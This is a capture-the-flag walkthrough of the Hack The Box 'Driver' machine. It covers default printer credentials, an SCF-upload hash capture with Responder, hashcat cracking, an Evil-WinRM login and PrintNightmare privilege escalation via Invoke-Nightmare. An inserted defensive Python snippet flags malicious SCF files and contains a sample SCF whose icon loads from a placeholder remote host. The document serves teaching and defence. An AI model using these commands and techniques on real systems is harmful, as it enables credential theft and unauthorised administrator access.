----------------------------------------------------------
This document is for educational purposes only, I take no responsibility for other people's actions. This is a review of Driver, a vulnerable VM from https://www.hackthebox.com.
----------------------------------------------------------
This is one of my favorite machines! I did it while it was still active so I had to hold off on publishing my walk-through for a bit, but here it is!
Once we power the machine on, we do an Nmap scan to see what we have to work with.
From our scan we can see that port 445 for SMB is up and running, this means that we have an active share that we could possibly explore. An active share is like a folder that can be accessed over a network. Let's see if I can just log in anonymously.
No such luck. Okay, well there's something on port 80, let's take a look at it. This is the prompt I get when I type the IP address into my browser bar.
Okay... this message gives us some key information. First, it lets us know that there is a user named 'admin'; next, it tells us the name of the system, 'MFP Firmware Update Center'. The first thing I'm going to do is look for default credentials for this system. A quick DuckDuckGo search gives us this page: https://support.hp.com/us-en/document/c05511827
This is a KB article for the HP LaserJet MFP M436. Looks like we're dealing with a printer...
Scrolling through the KB we hit on this:
Okay, let's try it! Looks like the default credentials got us into this thing! Now we have to find something that's going to allow us to escalate our privileges further. When I click on the 'Firmware Updates' tab, I get the option to upload a file... Maybe I could use this to get a reverse shell somehow?
I toy around with a few ideas. Then I start seriously considering an SMB Share - SCF File attack. Here's a blog post where you can read up on it:
So I'll give you the short and sweet of it:
We can use the SMB Share - SCF File attack to obtain password hashes of domain users via an SMB share. We know that there is an SMB share up and running; we just can't log into it because we don't know the username or password.
So, how do we go about gathering these hashes? We are going to do this with an SCF, or "Shell Command File".
An SCF is a Windows Explorer command file that can be used to launch commands by Windows Explorer, and they have been used by attackers to steal credentials. Simply by accessing a folder containing a malicious SCF file, a user will unwittingly share his computer's login credentials with an attacker via Google Chrome and the SMB protocol. In a 2015 BlackHat presentation, Stankovic created an SCF file that loads its icon image from a URL, at the other end of which he had an SMB server. This means that whenever the user's computer tried to load that icon from the SMB server, the server asked for and received the user's login credentials, because the user's computer thought it needed to authenticate.
The problem is that these SMB requests take place whether the user wants them to or not. The Windows OS is built to load file icons whenever the user navigates to a folder, NO QUESTIONS ASKED, no user interaction needed! So, when the user has navigated to a folder containing a malicious SCF file, within milliseconds the OS will read the SCF file, make a request to the remote SMB server, and give away the user's credentials in the form of an NTLMv2, NTLMv1, or LM password hash, depending on the user's OS version.
So we have the ability to upload files to the machine. That means that as long as they are not blocking outbound SMB requests with a firewall, we can get their system to query my "remote SMB server".
Let's go ahead and craft the Shell Command File (SCF) like this:
Okay, but it's important to rename it before we upload it. We have to save it with the '@' symbol at the front of the file name, because this will place the exploit file at the top of the victim's share drive and ensure that it gets executed. So we are going to rename it '@exploit.scf'.
Now all we need to do is set up Responder to capture the traffic and we'll get our hash. Responder is a tool that comes with Parrot and Kali; it is a Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) poisoner that responds to specific NetBIOS queries, by default file server requests. Then we go back to the web interface and upload our file. As soon as we do, we see action!
So we've got an NTLMv2 hash from a user named Tony.
Here's a cool little hint. If you ever want to know what mode you need to crack a hash in hashcat, just run hashid with the -m flag set and it will tell you.
As you can see, the hashcat mode we need to crack this particular hash is 5600. So let's run it through hashcat with the rockyou.txt list. This is going to be the command we use:
$ hashcat -a 0 -m 5600 /hash-file /rockyou.txt
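From the defender's side, the same two properties described above (an IconFile that points at a remote UNC path, and a file name prefixed with '@' so it sorts first) are exactly what an upload handler or share scanner can look for. The following is an added example, not code from the original walkthrough: a small Python parser for the INI-style SCF format that flags both indicators, run over a constructed sample (192.0.2.10 is a documentation address, not a real host).

```python
import re
from typing import Dict, List

# Constructed sample SCF body: an INI-style [Shell] section whose IconFile
# points at a UNC path on a remote host (192.0.2.10 is a documentation
# address used here as a placeholder, not a real SMB server).
SAMPLE_SCF = """[Shell]
Command=2
IconFile=\\\\192.0.2.10\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Matches a UNC path: two leading backslashes, a host name, then a separator.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like SCF format into {section: {key: value}}, lowercased."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_indicators(filename: str, text: str) -> List[str]:
    """Return the reasons an uploaded file looks like a credential-harvesting SCF."""
    findings: List[str] = []
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    if UNC_RE.match(icon):
        host = icon[2:].split("\\", 1)[0]
        findings.append(f"IconFile loads from remote host {host}")
    if filename.lower().endswith(".scf") and filename.startswith("@"):
        findings.append("name prefixed with '@' to sort first in Explorer")
    return findings


if __name__ == "__main__":
    for finding in scf_indicators("@exploit.scf", SAMPLE_SCF):
        print("FLAG:", finding)
```

A share owner can apply the same check to every .scf found on a share; blocking outbound SMB at the perimeter, as the text notes, removes the credential leak even when a file slips through.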
After a while we get a hit!
Sweet. Liltony. Nice one Tony. Now we can take that username and password combo and log into the SMB share.
Okay, we're in. Now let's try and snoop around the ADMIN$ share... Nope. C$? ... Nope. Well maybe IPC$?! Finally, we got access to something.
So, we can use Tony's credentials to log into the IPC$ share. This is the inter-process communication share. It's used for inter-process communication via named pipes and is not part of the file system, so this isn't going to be very useful.
After a while I give up and go back to my Nmap scan to look for some other clues. If you recall, port 5985 was open. I decide to look into it a little, and I learn something that might prove to be very valuable.
This port is used for Windows Remote Management. Is there a way to log into the machine remotely using the stolen credentials? Evil-WinRM to the rescue! It's an easy-to-download, easy-to-install tool. You can get it from here: https://github.com/Hackplayers/evil-winrm
Once it's installed we just log in with this command:
$./evil-winrm.rb -i 10.10.11.106 -u tony -p liltony
Nice! We're finally in! We can recover the first flag from the user Tony's desktop. Getting admin privileges will be harder though.
We are going to do some basic enumeration of the system with winPEAS. To do this we'll need to upload the privilege escalation script, and we can do that with Evil-WinRM's built-in file uploader. You can get a good idea of how to do it on the GitHub page for the evil-winrm tool. It's basically as simple as typing 'upload' and then the path to the file you want to upload from your local computer.
Now that we've uploaded our script onto the victim machine, we'll execute it. After parsing through the report I got from running winPEAS, I spot something interesting. At the bottom of the report I can see what kind of driver they're using. Now, we know that this box is called 'Driver' and it was released around the time the whole Driver Nightmare was a big problem (and it still is), so maybe this driver is vulnerable?
So let's do a DuckDuckGo search for it.
We get this:
It looks like many of these Ricoh drivers have a local privilege escalation vulnerability in them. That's just what we're looking for!
Going back to our report, we can see that there is a spoolsv (Print Spooler) service running on the local computer. If we search for 'spoolsv vulnerability' we'll find this:
We can see that this article is talking about CVE-2021-34527, which is part of the PrintNightmare vulnerability.
More research into PrintNightmare gets me to this link:
Reading this interesting article gives me some info: the vulnerability itself allows a low-privileged authenticated user to add a printer and, specifically, to provide a driver for that printer. The process checks that the user is authenticated and then grants them SYSTEM-level access to install drivers for the printer.
This means that with a low-privileged shell on a Windows box, or with valid credentials remotely, an attacker can get SYSTEM privileges on the host.
According to the above page, there is a really good exploit called Invoke-Nightmare LPE. This is a PowerShell script developed by Caleb Stewart and John Hammond. It exploits CVE-2021-1675, a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare". This is a pure PowerShell implementation.
We can get it from here:
According to Caleb Stewart's GitHub page, where the exploit is located, its usage is pretty straightforward.
Once the script is on the system, do the following.
Import-Module .\cve-2021-1675.ps1 (this will import the module).
Invoke-Nightmare -NewUser "user" -NewPassword "password", and that's basically it. Easy, huh?
Okay, we download it from the GitHub repository; now we have to get it onto the machine.
Nice! I uploaded it. But when I try to run it I get this error: it says "running scripts is disabled on this system". A little research gives us a solution.
All we have to do is force the execution policy to an Unrestricted state:
With that out of the way, let's follow the instructions from the GitHub page that I described before:
It works like a charm! Looks like we made a new user with admin privileges. Let's log in as them! We log in with our new credentials:
And soon enough the root flag is ours!
I'm really happy that I was able to share this walkthrough with you. This is one of my FAVORITE boxes. I love the combination of different vulnerabilities that weave themselves together to make a great adventure! Hope you enjoyed it!